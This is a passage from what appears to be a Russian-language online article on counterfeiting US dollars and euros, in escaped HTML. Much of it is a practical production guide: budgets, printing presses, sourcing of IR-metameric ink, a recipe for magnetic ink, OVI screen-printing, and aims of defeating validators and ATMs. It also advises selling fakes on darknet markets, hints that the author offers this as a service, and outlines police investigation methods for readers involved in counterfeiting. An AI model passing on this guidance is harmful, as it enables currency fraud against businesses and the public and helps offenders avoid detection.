    &lt;li id=&quot;zX79&quot;&gt;&lt;strong&gt;Изготовление 25 000 ленточек&lt;/strong&gt; — ~2 недели.&lt;/li&gt;
    &lt;li id=&quot;L2c9&quot;&gt;&lt;strong&gt;Сборка 25 000 листов&lt;/strong&gt; — &lt;strong&gt;3-4 месяца&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Aj6b&quot;&gt;Общий срок — &lt;strong&gt;5 месяцев&lt;/strong&gt;, &lt;strong&gt;по 10 часов в день, без перерывов и перекуров&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;wDPy&quot;&gt;&lt;strong&gt;ВСЕГО: ~50 000 USD&lt;/strong&gt;.&lt;/blockquote&gt;
  &lt;p id=&quot;JxBn&quot;&gt;Если &lt;strong&gt;пытаться экономить на сборке&lt;/strong&gt;, можно клеить кисточкой и валиком, сушить на бельевой веревке. Но в таком случае &lt;strong&gt;25000 листов займут не 5 месяцев, а лет 5-10&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;sQrc&quot;&gt;&lt;em&gt;&amp;quot;Цены на оборудование примерные. Если будешь делать сам — можно вложиться в указанное. Если решишь купить готовое — смело умножай на 10&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h2 id=&quot;LTu8&quot;&gt;&lt;strong&gt;ПЕЧАТЬ: выбираем между компромиссами&lt;/strong&gt;&lt;/h2&gt;
  &lt;p id=&quot;iZc1&quot;&gt;Когда вопрос с бумагой закрыт, пора переходить к самому важному — &lt;strong&gt;нанесению изображений и защитных элементов&lt;/strong&gt;. Здесь, как и раньше, можно пойти &lt;strong&gt;разными путями&lt;/strong&gt;:&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;QrtG&quot;&gt;&lt;strong&gt;Первый вариант: печать струйниками — дешево, быстро, но компромиссно&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;Jbsf&quot;&gt;Если ты выбрал &lt;strong&gt;полноцветную печать&lt;/strong&gt;, потребуется &lt;strong&gt;как минимум&lt;/strong&gt; струйный принтер. Один &lt;strong&gt;шестицветный струйник&lt;/strong&gt; печатает лист &lt;strong&gt;A4 за минуту&lt;/strong&gt;, значит, обе стороны займут &lt;strong&gt;2 минуты&lt;/strong&gt;. Получаем, что &lt;strong&gt;полноцветный фон для всей партии&lt;/strong&gt; будет готов за &lt;strong&gt;1,5–2 месяца&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;6MF9&quot;&gt;&lt;em&gt;&amp;quot;Это узкое место легко решается покупкой дополнительных принтеров. Чем больше у тебя их будет, тем быстрее закончишь.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;x2WO&quot;&gt;Цена одного &lt;strong&gt;хорошего шестицветного струйного принтера&lt;/strong&gt; — &lt;strong&gt;около 500 USD&lt;/strong&gt;. Покупаем &lt;strong&gt;2–3 таких принтера, СНПЧ (система непрерывной подачи чернил), резак&lt;/strong&gt;, и в &lt;strong&gt;5000 USD&lt;/strong&gt; вполне можно уложиться.&lt;/p&gt;
  &lt;p id=&quot;5Il0&quot;&gt;&lt;strong&gt;Что получаем?&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;tH5R&quot;&gt;Если ты &lt;strong&gt;сэкономил на печати&lt;/strong&gt;, значит, &lt;strong&gt;сэкономил и на бумаге&lt;/strong&gt;. Это означает, что &lt;strong&gt;продукт не пройдет детекторы&lt;/strong&gt;, будет &lt;strong&gt;детектироваться даже простыми ИК-лампами&lt;/strong&gt;, &lt;strong&gt;НО!&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote id=&quot;zwcr&quot;&gt;&lt;strong&gt;Это будет на порядок лучше, чем то, что продается в интернете.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;6c01&quot;&gt;Такие изделия &lt;strong&gt;не светятся в УФ&lt;/strong&gt;, их &lt;strong&gt;не нужно брызгать лаком для волос&lt;/strong&gt;, а &lt;strong&gt;бумага будет нужной плотности и текстуры&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;exnx&quot;&gt;&lt;strong&gt;Можно продать на даркмаркете или в офлайне, но брать за них больше 20–30% от номинала я бы постеснялся.&lt;/strong&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;H6mm&quot;&gt;Общий бюджет — &lt;strong&gt;не более 25 000 USD&lt;/strong&gt; за всё.&lt;/p&gt;
  &lt;p id=&quot;NZdP&quot;&gt;Но здесь очевидный риск — &lt;strong&gt;слишком простой путь ведет к быстрому плачевному итогу&lt;/strong&gt;. Это &lt;strong&gt;как возить наркотики&lt;/strong&gt; — прибыльно, но шанс сесть &lt;strong&gt;огромный&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;kHin&quot;&gt;&lt;strong&gt;Второй вариант: металлография, защитные элементы и валидаторы&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;Fgj5&quot;&gt;Если цель — &lt;strong&gt;изделия, проходящие валидаторы и АТМ&lt;/strong&gt; (например, &lt;strong&gt;&amp;quot;синенькие&amp;quot; доллары&lt;/strong&gt; или евро), придется пройти &lt;strong&gt;еще один этап печати&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;oeDG&quot;&gt;Есть два пути:&lt;/p&gt;
  &lt;ul id=&quot;e5AO&quot;&gt;
    &lt;li id=&quot;maKN&quot;&gt;&lt;strong&gt;Для USD 1996 года&lt;/strong&gt; можно было бы &lt;strong&gt;ограничиться металлографией&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;oedP&quot;&gt;&lt;strong&gt;Для более новых выпусков евро и долларов&lt;/strong&gt; потребуется &lt;strong&gt;полноцветная печать + металлография&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;TGXA&quot;&gt;Здесь главные затраты — &lt;strong&gt;печатный станок, клише и краски&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;sNDZ&quot;&gt;&lt;strong&gt;Сколько стоит печатный станок?&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;PYee&quot;&gt;
    &lt;li id=&quot;XNg7&quot;&gt;&lt;strong&gt;1000 USD&lt;/strong&gt; — ручной, винтовой прижим, колесная протяжка.&lt;/li&gt;
    &lt;li id=&quot;P2th&quot;&gt;&lt;strong&gt;5–10K USD&lt;/strong&gt; — механический прижим, электрическая протяжка.&lt;/li&gt;
    &lt;li id=&quot;xH5Q&quot;&gt;&lt;strong&gt;50K USD&lt;/strong&gt; — пневмопривод, полная автоматика.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;fqkh&quot;&gt;&lt;em&gt;&amp;quot;Чем больше автоматизация — тем меньше брак, стабильнее параметры изделий, но дороже вход.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Q2YG&quot;&gt;&lt;strong&gt;Краски: главный расходник&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;LKmb&quot;&gt;Обычные краски здесь &lt;strong&gt;не подойдут:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;5qFm&quot;&gt;
    &lt;li id=&quot;WFuE&quot;&gt;&lt;strong&gt;ИК-метамерная краска не продается нигде&lt;/strong&gt;. Но &lt;strong&gt;0.1 + 0.1 кг&lt;/strong&gt; (ИК-метамерной пары) можно достать за &lt;strong&gt;5000 USD&lt;/strong&gt;, независимо от базового цвета.&lt;/li&gt;
    &lt;li id=&quot;5dYx&quot;&gt;&lt;strong&gt;Магнитные краски&lt;/strong&gt; делаются &lt;strong&gt;самостоятельно&lt;/strong&gt; из &lt;strong&gt;прозрачной базы, черного пигмента и черного феромагнитного порошка&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;DtyE&quot;&gt;&lt;strong&gt;OVI-краска&lt;/strong&gt; наносится либо &lt;strong&gt;как часть металлографии&lt;/strong&gt;, либо &lt;strong&gt;отдельным слоем шелкотрафарета&lt;/strong&gt;. Если у тебя &lt;strong&gt;остался шелкографический станок с этапа печати ВЗ&lt;/strong&gt;, просто делаешь &lt;strong&gt;новый трафарет и используешь краску от китайских друзей&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;kDJ9&quot;&gt;&lt;em&gt;&amp;quot;Если пошел по пути изделий для валидаторов и АТМ, придется добавить механический нумератор за 50K USD и еще одну краску — спецэлемент «М».&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;QRZE&quot;&gt;&lt;strong&gt;Последние штрихи: голограммы, резка и упаковка&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;mgZc&quot;&gt;Для евро и некоторых других купюр потребуются голографические элементы. Углубляться в процесс термотрансфера я здесь не буду — кто ищет, тот всегда найдет. Лентикуляры для «синеньких» долларов — отдельная история. Их производство не требует космических технологий, но оборудование для печати стоит в пределах 100K USD.&lt;/p&gt;
  &lt;p id=&quot;lJY3&quot;&gt;После печати остается только резка и упаковка. Если экономим, берем сабельный резак. Если идем по-богатому, выбираем электромеханический резак на 100+ листов — цена 2-3K USD.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;qDb1&quot;&gt;&lt;strong&gt;Финансовый итог: сколько стоит этот стартап?&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;C5yC&quot;&gt;Минимальная сумма &lt;strong&gt;для входа&lt;/strong&gt; — &lt;strong&gt;$500K – $1M&lt;/strong&gt;, в зависимости от &lt;strong&gt;прямоты рук, пытливости ума и наличия бюджета&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;0UGk&quot;&gt;&lt;em&gt;&amp;quot;Если хочется, чтобы кто-то сделал всё за вас, умножайте эту сумму на два, и, как всегда, вы знаете, с кем это обсуждать.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;v94h&quot;&gt;5. Почему на дарк-рынке нет фальши?&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;crWG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ed/28/ed28ad9d-d904-4dbf-b03f-c333b9584560.png&quot; width=&quot;1816&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;aXy8&quot;&gt;Фальшивомонетничество &lt;strong&gt;звучит привлекательно&lt;/strong&gt; в воображении людей, далеких от реальности. Кажется, что вот напечатаю себе пару сотен тысяч купюр и буду жить в шоколаде или продам их дурачкам по 50% от номинала. Но давайте прикинем в последний раз:&lt;/p&gt;
  &lt;ul id=&quot;8lbU&quot;&gt;
    &lt;li id=&quot;6pzR&quot;&gt;&lt;strong&gt;Финансовая катастрофа &lt;/strong&gt;Минимальный входной порог для производства фальшивых купюр составляет от $25 000 — и это за низкокачественные изделия, которые даже в руки неприятно взять, не говоря уже о том, чтобы понести их в АТМ или банк. Если же речь идет о высококачественном производстве, которое потенциально может пройти валидацию, то затраты начинаются от $1.5M – $2M.&lt;/li&gt;
    &lt;li id=&quot;Gt4d&quot;&gt;&lt;strong&gt;Опасность сбыта &lt;/strong&gt;Допустим, человек решил сбывать по 5–10 купюр в день. Тогда, чтобы реализовать всю партию из 25 000 изделий, понадобится от 7 до 15 лет ежедневного сбыта. А теперь вопрос: &amp;quot;Сколько из этих 3000–5000 покупателей окажутся подставными?&amp;quot;&lt;/li&gt;
    &lt;li id=&quot;8hKm&quot;&gt;&lt;strong&gt;Cуровость наказания&lt;/strong&gt;&lt;br /&gt;Фальшивомонетничество не просто преступление, это посягательство на финансовую систему государства. Во всем мире наказания за фальшивомонетничество одни из самых суровых: США — до 20 лет тюрьмы, Россия — до 15 лет лишения свободы, в СССР и вовсе расстреливали. В отличие от других финансовых преступлений, здесь не будет условного срока. В большинстве случаев арест происходит при первой же серьезной сделке, а человек получает по полной программе.&lt;/li&gt;
    &lt;li id=&quot;wOFq&quot;&gt;&lt;strong&gt;Некачественные подделки &lt;/strong&gt;Если у человека получилось сделать купюру, которую жрёт банкомат, то какой ему резон продавать их всяким немощным по 50%, если он может использовать их сам? Риск практически такой же будет.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;40yt&quot;&gt;&lt;em&gt;Теперь думайте, какого качества фальшивки можно найти на европейских дакр-маркетах по типу абакуса или архетипа в таких условиях?&lt;/em&gt;&lt;/blockquote&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;W7gx&quot;&gt;6. Расследование преступлений, связанных с подделками&lt;/h2&gt;
  &lt;/section&gt;
  &lt;blockquote id=&quot;mpTe&quot;&gt;Сейчас я поделюсь с вами методикой, по которой расследуют преступления связанные с фальшью, такое будет полезно изучить, если вы хоть как-то с ними связаны или планируете связаться, что я крайне не рекомендую, но...&lt;/blockquote&gt;
  &lt;figure id=&quot;eNWv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0c/81/0c813edb-a8c4-4adb-993e-01489b9cae74.png&quot; width=&quot;1816&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zvDs&quot;&gt;Чтобы успешно расследовать преступления, связанные с фальшивыми деньгами, важно &lt;strong&gt;как можно быстрее&lt;/strong&gt; возбудить уголовное дело. Для этого нужны &lt;strong&gt;четкие основания&lt;/strong&gt; – например, если кто-то сообщил о подозрительных купюрах.&lt;/p&gt;
  &lt;p id=&quot;JH7X&quot;&gt;Обычно полиция узнает о таких преступлениях из:&lt;/p&gt;
  &lt;ul id=&quot;sJvX&quot;&gt;
    &lt;li id=&quot;sH8m&quot;&gt;заявлений граждан, которые случайно получили подделку,&lt;/li&gt;
    &lt;li id=&quot;3YTB&quot;&gt;явок с повинной,&lt;/li&gt;
    &lt;li id=&quot;GGQ5&quot;&gt;сообщений магазинов и банков, где обнаружили фальшивые купюры,&lt;/li&gt;
    &lt;li id=&quot;d0Pz&quot;&gt;собственной работы правоохранителей и оперативных данных.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Goj3&quot;&gt;После выявления преступления начинается сложная работа. &lt;strong&gt;На старте расследования важно проверить все детали&lt;/strong&gt; – от этого зависит, будет ли возбуждено дело и удастся ли найти виновных.&lt;/p&gt;
  &lt;p id=&quot;QG9R&quot;&gt;&lt;strong&gt;Предварительная проверка&lt;/strong&gt; – это обязательный этап, который проводят следователи, чтобы убедиться в достоверности заявления о преступлении и собрать дополнительные сведения. Она помогает принять &lt;strong&gt;обоснованное процессуальное решение&lt;/strong&gt; – возбуждать уголовное дело или нет.&lt;/p&gt;
  &lt;p id=&quot;cIa2&quot;&gt;&lt;em&gt;При расследовании фальшивомонетничества следователи устанавливают:&lt;/em&gt;&lt;/p&gt;
  &lt;ul id=&quot;G8BW&quot;&gt;
    &lt;li id=&quot;4vcI&quot;&gt;Было ли изготовление или сбыт поддельных денег? В каком объеме? Совершено ли преступление группой или рецидивистом?&lt;/li&gt;
    &lt;li id=&quot;JVXN&quot;&gt;Где и как происходил сбыт фальшивок?&lt;/li&gt;
    &lt;li id=&quot;d8Lx&quot;&gt;Знал ли человек, что распространяет поддельные деньги?&lt;/li&gt;
    &lt;li id=&quot;Evd9&quot;&gt;Какие именно купюры подделывались? Сколько их было?&lt;/li&gt;
    &lt;li id=&quot;IZN2&quot;&gt;Какой ущерб нанесен? Использовалось ли промышленное оборудование?&lt;/li&gt;
    &lt;li id=&quot;9zVu&quot;&gt;Как преступники получили доступ к материалам и инструментам?&lt;/li&gt;
    &lt;li id=&quot;LcgC&quot;&gt;Кто непосредственно изготавливал фальшивые деньги?&lt;/li&gt;
    &lt;li id=&quot;rQmR&quot;&gt;Как фальшивки доставлялись к месту сбыта?&lt;/li&gt;
    &lt;li id=&quot;gau9&quot;&gt;Кто входил в группу и какие роли выполнял?&lt;/li&gt;
    &lt;li id=&quot;65fe&quot;&gt;Какова личность преступников и их финансовое положение?&lt;/li&gt;
    &lt;li id=&quot;3Yyb&quot;&gt;Есть ли свидетели, которые знали о преступлении, но не сообщили властям?&lt;/li&gt;
    &lt;li id=&quot;XDiT&quot;&gt;Какие обстоятельства способствовали преступлению?&lt;/li&gt;
    &lt;li id=&quot;2451&quot;&gt;Какие деньги и имущество подлежат конфискации, так как связаны с преступной деятельностью?&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;jNDf&quot;&gt;Каждое дело требует &lt;strong&gt;индивидуального подхода&lt;/strong&gt;, поэтому перечень вопросов в расследовании может дополняться в зависимости от его специфики.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;9I5R&quot;&gt;&lt;strong&gt;Первая ситуация: купюру нашли в организации&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;Mm9E&quot;&gt;Одна из наиболее распространенных ситуаций (46% от всех дел) – это &lt;strong&gt;обнаружение поддельных денег в банках, финансовых учреждениях или у граждан&lt;/strong&gt;, когда информация о преступниках отсутствует.&lt;/p&gt;
  &lt;p id=&quot;CnJM&quot;&gt;Алгоритм действий следователей в таких случаях:&lt;/p&gt;
  &lt;ol id=&quot;w0TT&quot;&gt;
    &lt;li id=&quot;hi8E&quot;&gt;Банковские сотрудники проверяют купюры на подлинность согласно указаниям &lt;strong&gt;Центрального банка России&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;HYhM&quot;&gt;Если выявлена фальшивка, &lt;strong&gt;немедленно вызывается следственно-оперативная группа&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;uCUT&quot;&gt;После выявления поддельных купюр следственно-оперативная группа проводит &lt;strong&gt;неотложные мероприятия&lt;/strong&gt;, включая:&lt;/li&gt;
  &lt;/ol&gt;
  &lt;ul id=&quot;IpVa&quot;&gt;
    &lt;li id=&quot;XLHv&quot;&gt;&lt;strong&gt;Осмотр места происшествия&lt;/strong&gt; с фото- и видеосъемкой.&lt;/li&gt;
    &lt;li id=&quot;h4lf&quot;&gt;&lt;strong&gt;Изъятие поддельной купюры&lt;/strong&gt;, попытки выявления отпечатков пальцев возможного сбытчика.&lt;/li&gt;
    &lt;li id=&quot;ZVx2&quot;&gt;&lt;strong&gt;Допрос лиц&lt;/strong&gt;, обнаруживших фальшивку.&lt;/li&gt;
    &lt;li id=&quot;juPh&quot;&gt;&lt;strong&gt;Поиск очевидцев и ориентировочные мероприятия&lt;/strong&gt; для установления личности преступника.&lt;/li&gt;
    &lt;li id=&quot;gzoP&quot;&gt;&lt;strong&gt;Проверка ранее судимых за аналогичные преступления&lt;/strong&gt; и лиц, имеющих доступ к оборудованию для подделки.&lt;/li&gt;
    &lt;li id=&quot;BJB1&quot;&gt;&lt;strong&gt;Обследование близлежащих торговых точек&lt;/strong&gt; на предмет возможного сбыта других подделок.&lt;/li&gt;
    &lt;li id=&quot;3y6o&quot;&gt;&lt;strong&gt;Сравнение купюры с базой данных фальшивых денег&lt;/strong&gt;, чтобы определить источник происхождения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;p7Zr&quot;&gt;&lt;strong&gt;Проблема с выявлением отпечатков пальцев&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;lzXM&quot;&gt;Анализ судебной практики показывает, что &lt;strong&gt;в 97% случаев до возбуждения уголовного дела не проводится дактилоскопическая экспертиза купюры&lt;/strong&gt;. Это приводит к &lt;strong&gt;утрате важных улик&lt;/strong&gt;, что значительно осложняет дальнейшее расследование.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Sn6a&quot;&gt;&lt;strong&gt;Вторая следственная ситуация: сбыт поддельных денег с исчезновением преступника&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;x3mM&quot;&gt;Во втором типе следственной ситуации &lt;strong&gt;поддельные купюры выявляются при сбыте или сразу после него&lt;/strong&gt;, но преступник &lt;strong&gt;скрывается&lt;/strong&gt;. При этом у следствия уже есть &lt;strong&gt;ориентировочная информация&lt;/strong&gt; о сбытчике (28% от изученных дел).&lt;/p&gt;
  &lt;p id=&quot;0oF3&quot;&gt;Эта ситуация отличается от первой тем, что:&lt;/p&gt;
  &lt;ul id=&quot;qWT3&quot;&gt;
    &lt;li id=&quot;Clt6&quot;&gt;&lt;strong&gt;Есть данные о месте преступления&lt;/strong&gt;, что позволяет быстрее организовать расследование.&lt;/li&gt;
    &lt;li id=&quot;Qi6U&quot;&gt;&lt;strong&gt;Присутствуют зацепки о личности преступника&lt;/strong&gt;, что дает шанс оперативно выйти на его след.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;OpPp&quot;&gt;&lt;strong&gt;Действия следователей&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;KuRX&quot;&gt;В данном случае следственная группа:&lt;/p&gt;
  &lt;ul id=&quot;eiCs&quot;&gt;
    &lt;li id=&quot;spnE&quot;&gt;&lt;strong&gt;Ищет следы пребывания подозреваемого&lt;/strong&gt; на месте преступления.&lt;/li&gt;
    &lt;li id=&quot;PLjW&quot;&gt;&lt;strong&gt;Изучает вещественные доказательства&lt;/strong&gt;, оставленные сбытчиком.&lt;/li&gt;
    &lt;li id=&quot;FFH2&quot;&gt;&lt;strong&gt;Анализирует связи&lt;/strong&gt; между подозреваемым и другими возможными участниками преступления.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;eagq&quot;&gt;В данной ситуации, помимо стандартных следственных и оперативно-розыскных действий, &lt;strong&gt;следственно-оперативная группа&lt;/strong&gt; предпринимает &lt;strong&gt;ряд дополнительных мер&lt;/strong&gt;, направленных на установление личности сбытчика и его розыск:&lt;/p&gt;
  &lt;ul id=&quot;k1ed&quot;&gt;
    &lt;li id=&quot;6Bka&quot;&gt;&lt;strong&gt;Допрос потерпевших и очевидцев&lt;/strong&gt; для получения детальной информации о внешности преступника, его поведении и обстоятельствах преступления.&lt;/li&gt;
    &lt;li id=&quot;DIPm&quot;&gt;&lt;strong&gt;Составление фоторобота или композиционного портрета&lt;/strong&gt; подозреваемого на основании свидетельских показаний.&lt;/li&gt;
    &lt;li id=&quot;JqVx&quot;&gt;&lt;strong&gt;Осмотр предметов&lt;/strong&gt;, на которых могли остаться следы сбытчика (например, упаковок, дверных ручек, столов и других поверхностей, с которыми он контактировал).&lt;/li&gt;
    &lt;li id=&quot;NeaY&quot;&gt;&lt;strong&gt;Проверка граждан вблизи места преступления&lt;/strong&gt;, соответствующих приметам, указанным очевидцами. В ориентировку включается весь личный состав ОВД.&lt;/li&gt;
    &lt;li id=&quot;BanK&quot;&gt;&lt;strong&gt;Составление опознавательных таблиц&lt;/strong&gt; из фотографий граждан, ранее задержанных за аналогичные преступления, и предъявление их очевидцам для опознания.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;ixsP&quot;&gt;&lt;strong&gt;Третья следственная ситуация: подозреваемый отрицает вину, фактические улики отсутствуют&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;WslV&quot;&gt;В 6% случаев при попытке сбыта поддельных денег &lt;strong&gt;подозреваемый отрицает свою причастность&lt;/strong&gt;, и у следствия нет &lt;strong&gt;прямых доказательств&lt;/strong&gt;, подтверждающих его вину.&lt;/p&gt;
  &lt;p id=&quot;pwT9&quot;&gt;&lt;strong&gt;Основные задачи расследования:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;cZtX&quot;&gt;
    &lt;li id=&quot;0I1H&quot;&gt;Анализ поведения подозреваемого, его реакции на предъявленные доказательства.&lt;/li&gt;
    &lt;li id=&quot;ScPB&quot;&gt;Установление возможных &lt;strong&gt;сообщников&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;YJQn&quot;&gt;Поиск &lt;strong&gt;места изготовления и хранения&lt;/strong&gt; поддельных купюр.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;0AV3&quot;&gt;&lt;strong&gt;Меры следственно-оперативной группы&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;mDgg&quot;&gt;В подобных случаях проводятся следующие действия:&lt;/p&gt;
  &lt;ul id=&quot;EQ2B&quot;&gt;
    &lt;li id=&quot;5f2K&quot;&gt;&lt;strong&gt;Задержание подозреваемого&lt;/strong&gt;, его личный обыск и допрос.&lt;/li&gt;
    &lt;li id=&quot;b6GV&quot;&gt;&lt;strong&gt;Проверка его версии&lt;/strong&gt;, выяснение, откуда у него появились фальшивые купюры.&lt;/li&gt;
    &lt;li id=&quot;BGlJ&quot;&gt;&lt;strong&gt;Изучение личности задержанного&lt;/strong&gt; через оперативные источники.&lt;/li&gt;
    &lt;li id=&quot;cAIV&quot;&gt;Уточнение &lt;strong&gt;профессии, рода занятий&lt;/strong&gt;, прежнего и текущего места работы.&lt;/li&gt;
    &lt;li id=&quot;AIte&quot;&gt;&lt;strong&gt;Обыск&lt;/strong&gt; в доме и на рабочем месте.&lt;/li&gt;
    &lt;li id=&quot;fGqm&quot;&gt;Анализ &lt;strong&gt;его круга общения&lt;/strong&gt;, проверка знакомых и родственников.&lt;/li&gt;
    &lt;li id=&quot;Z6rX&quot;&gt;Выяснение, владеет ли он или его окружение &lt;strong&gt;навыками гравера, полиграфиста, фотографа&lt;/strong&gt; и т. п.&lt;/li&gt;
    &lt;li id=&quot;IzOe&quot;&gt;Проверка доступа подозреваемого к &lt;strong&gt;материалам и оборудованию&lt;/strong&gt;, пригодным для изготовления фальшивок.&lt;/li&gt;
    &lt;li id=&quot;LFP3&quot;&gt;После завершения официальных процедур &lt;strong&gt;за задержанным устанавливается наблюдение&lt;/strong&gt;, чтобы выявить возможные связи и новые улики.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;18F2&quot;&gt;&lt;strong&gt;Четвертая следственная ситуация: задержание сбытчика при преступлении или сразу после него&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;Uko3&quot;&gt;В 9% случаев сбытчик поддельных денег &lt;strong&gt;задерживается с поличным&lt;/strong&gt; – либо &lt;strong&gt;во время сбыта&lt;/strong&gt;, либо &lt;strong&gt;сразу после передачи фальшивых купюр&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;hpXF&quot;&gt;&lt;strong&gt;Действия следственно-оперативной группы:&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;l6zh&quot;&gt;
    &lt;li id=&quot;9EY9&quot;&gt;&lt;strong&gt;Немедленное задержание&lt;/strong&gt; сбытчика.&lt;/li&gt;
    &lt;li id=&quot;F4nw&quot;&gt;&lt;strong&gt;Личный обыск&lt;/strong&gt;, в ходе которого фиксируются:&lt;/li&gt;
    &lt;ul id=&quot;16S6&quot;&gt;
      &lt;li id=&quot;fjB0&quot;&gt;место обнаружения денежных купюр,&lt;/li&gt;
      &lt;li id=&quot;N7FF&quot;&gt;их количество и номинал,&lt;/li&gt;
      &lt;li id=&quot;eq0C&quot;&gt;серийные номера,&lt;/li&gt;
      &lt;li id=&quot;nHzp&quot;&gt;расположение купюр (подлинные и поддельные в одном или разных карманах),&lt;/li&gt;
      &lt;li id=&quot;PyMW&quot;&gt;наличие потайных карманов.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;MnYL&quot;&gt;Эти детали важны, чтобы &lt;strong&gt;опровергнуть возможную версию&lt;/strong&gt; задержанного о том, что он &lt;strong&gt;не знал о подделке&lt;/strong&gt;.&lt;/p&gt;
  &lt;ul id=&quot;TWLZ&quot;&gt;
    &lt;li id=&quot;dyPu&quot;&gt;&lt;strong&gt;Оперативная проверка ближайших торговых точек&lt;/strong&gt; на предмет других фактов сбыта фальшивых купюр.&lt;/li&gt;
    &lt;li id=&quot;qrZp&quot;&gt;&lt;strong&gt;Осмотр места происшествия&lt;/strong&gt;, если преступник попытался избавиться от купюр перед задержанием.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;BPKV&quot;&gt;&lt;strong&gt;Пятая следственная ситуация: уголовное дело, возбужденное после оперативно-розыскных мероприятий&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;wC4c&quot;&gt;В 11% случаев уголовные дела о фальшивомонетничестве &lt;strong&gt;возбуждаются на основе данных оперативно-розыскной деятельности (ОРД)&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;Fj8K&quot;&gt;&lt;strong&gt;Основные задачи расследования:&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;3Pmk&quot;&gt;
    &lt;li id=&quot;5eMs&quot;&gt;&lt;strong&gt;Выявление фактов производства и сбыта фальшивых денег.&lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;FIpM&quot;&gt;&lt;strong&gt;Фиксация оперативных данных&lt;/strong&gt; в материалах уголовного дела.&lt;/li&gt;
    &lt;li id=&quot;USvN&quot;&gt;&lt;strong&gt;Закрепление доказательств&lt;/strong&gt; через неотложные следственные действия.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;jjhX&quot;&gt;&lt;strong&gt;Необходимость взаимодействия следствия и оперативников&lt;/strong&gt;&lt;/h3&gt;
